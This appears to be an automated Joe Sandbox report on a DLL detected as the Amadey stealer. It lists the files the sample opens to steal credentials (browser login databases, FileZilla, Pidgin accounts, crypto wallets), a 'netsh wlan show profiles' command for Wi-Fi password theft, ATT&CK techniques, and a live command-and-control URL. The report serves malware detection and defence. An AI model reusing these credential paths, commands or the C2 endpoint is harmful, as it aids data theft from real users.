    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Uses netsh to modify the Windows network and firewall settings
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

    Stealing of Sensitive Information

    barindex
    Yara detected Amadeys stealer DLL
    Source: Yara matchFile source: 0j6nSbUQQS.dll, type: SAMPLE
    Found many strings related to Crypto-Wallets (likely being stolen)
    Source: rundll32.exe, 0000000E.00000002.2006335358.0000000002AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
    Source: rundll32.exe, 00000004.00000002.1933821234.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\y`
    Source: rundll32.exe, 00000004.00000002.1933821234.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\y`
    Source: rundll32.exe, 00000004.00000002.1933821234.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\y`
    Source: powershell.exe, 0000000A.00000002.1854168483.00000272DFE72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
    Tries to harvest and steal WLAN passwords
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.jsonJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.jsonJump to behavior
    Tries to harvest and steal ftp login credentials
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
    Tries to steal Instant Messenger accounts or passwords
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\oobe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files (x86)\SAKdUOMwdLWNDHuLiohnbyuKfJxGjOCUiRGuEjjNLzmpYeUJQBmol\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\oobe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files (x86)\SAKdUOMwdLWNDHuLiohnbyuKfJxGjOCUiRGuEjjNLzmpYeUJQBmol\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\oobe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files (x86)\SAKdUOMwdLWNDHuLiohnbyuKfJxGjOCUiRGuEjjNLzmpYeUJQBmol\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading    		111
    Process Injection    		1
    Disable or Modify Tools    		2
    OS Credential Dumping    		1
    Security Software Discovery    		Remote Services3
    Data from Local System    		1
    Non-Application Layer Protocol    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		1
    Credentials in Registry    		1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media11
    Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
    Process Injection    		1
    Credentials In Files    		21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Rundll32    		LSA Secrets2
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials13
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1543325 Sample: 0j6nSbUQQS.dll Startdate: 27/10/2024 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Sigma detected: Capture Wi-Fi password 2->58 60 5 other signatures 2->60 9 loaddll32.exe 1 2->9         started        process3 process4 11 rundll32.exe 21 9->11         started        14 rundll32.exe 23 9->14         started        16 cmd.exe 1 9->16         started        18 3 other processes 9->18 signatures5 72 System process connects to network (likely due to code injection or exploit) 11->72 74 Tries to steal Instant Messenger accounts or passwords 11->74 76 Found many strings related to Crypto-Wallets (likely being stolen) 11->76 82 2 other signatures 11->82 20 powershell.exe 11->20         started        23 netsh.exe 2 11->23         started        78 Uses netsh to modify the Windows network and firewall settings 14->78 80 Tries to harvest and steal WLAN passwords 14->80 25 powershell.exe 14->25         started        28 netsh.exe 2 14->28         started        30 rundll32.exe 19 16->30         started        process6 dnsIp7 33 conhost.exe 20->33         started        35 conhost.exe 23->35         started        50 C:\Users\user\...\246122658369_Desktop.zip, Zip 25->50 dropped 62 Loading BitLocker PowerShell Module 25->62 37 conhost.exe 25->37         started        39 conhost.exe 28->39         started        52 185.215.113.217, 49730, 49731, 49732 WHOLESALECONNECTIONSNL Portugal 30->52 64 Tries to steal Instant Messenger accounts or passwords 30->64 66 Found many strings related to Crypto-Wallets (likely being stolen) 30->66 68 Tries to harvest and steal WLAN passwords 30->68 41 powershell.exe 25 30->41         started        44 netsh.exe 2 30->44         started        file8 signatures9 process10 signatures11 70 Loading BitLocker PowerShell Module 41->70 46 conhost.exe 41->46         started        48 conhost.exe 44->48         started        process12

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    0j6nSbUQQS.dll55%ReversingLabsWin32.Trojan.BotX

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://aka.ms/winsvr-2022-pshelpX0%URL Reputationsafe
    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://aka.ms/pscore680%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://185.215.113.217/CoreOPT/index.phptrue
      		unknown
      http://185.215.113.217/CoreOPT/index.php?wal=1true
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1790967706.000001968F774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272D16D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1854168483.00000272DFE72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1971273343.0000023710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.00000237018D5000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000012.00000002.1840708618.0000023701131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.0000023701312000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.1840708618.0000023700228000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000009.00000002.1790967706.000001968DFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272D0028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.0000023700228000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://crl.mRpowershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.1840708618.0000023700228000.00000004.00000800.00020000.00000000.sdmpfalse
            		unknown
            http://crl.mUpowershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000012.00000002.1840708618.00000237018D5000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000012.00000002.1840708618.00000237018D5000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000009.00000002.1790967706.000001968F3DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272D12AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.000002370162A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://185.215.113.217/CoreOPT/index.php?wal=1.rundll32.exe, 00000003.00000002.1924040267.0000000002CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.1840708618.0000023700228000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  http://185.215.113.217/rundll32.exe, 00000003.00000002.1924040267.0000000002D08000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://ion=v4.5powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.217/CoreOPT/index.php?wal=1Krundll32.exe, 00000003.00000002.1924040267.0000000002CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.1790967706.000001968DFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272D0028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.0000023700228000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 00000012.00000002.1840708618.00000237018D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1790967706.000001968F774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272D16D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1854168483.00000272DFE72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1971273343.0000023710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.00000237018D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://185.215.113.217/CoreOPT/index.phphrundll32.exe, 00000003.00000002.1924040267.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.217/%rundll32.exe, 00000003.00000002.1924040267.0000000002D08000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://aka.ms/pscore68powershell.exe, 00000009.00000002.1790967706.000001968DDC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272CFE01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.0000023700001000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://185.215.113.217/Contactsrundll32.exe, 00000003.00000002.1924040267.0000000002CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1790967706.000001968DDC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1789459396.00000272CFE01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1840708618.0000023700001000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.217
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1543325
                              Start date and time:2024-10-27 17:46:06 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 2s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:23
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:0j6nSbUQQS.dll
                              renamed because original name is a hash value
                              Original Sample Name:921b0badeaffee860310e6755769337e.dll
                              Detection:MAL
                              Classification:mal100.phis.troj.spyw.evad.winDLL@32/18@0/1
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 4
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .dll
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 1184 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtEnumerateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: 0j6nSbUQQS.dll

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              12:47:06API Interceptor58x Sleep call for process: powershell.exe modified
                              12:47:09API Interceptor1x Sleep call for process: loaddll32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.217uLV6jN2BWh.dllGet hashmaliciousUnknownBrowse
                              • 185.215.113.217/CoreOPT/index.php
                              uLV6jN2BWh.dllGet hashmaliciousUnknownBrowse
                              • 185.215.113.217/CoreOPT/index.php
                              mU3Ob2XcCt.dllGet hashmaliciousAmadeyBrowse
                              • 185.215.113.217/CoreOPT/index.php?wal=1

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):0.34726597513537405
                              Encrypted:false
                              SSDEEP:3:Nlll:Nll
                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
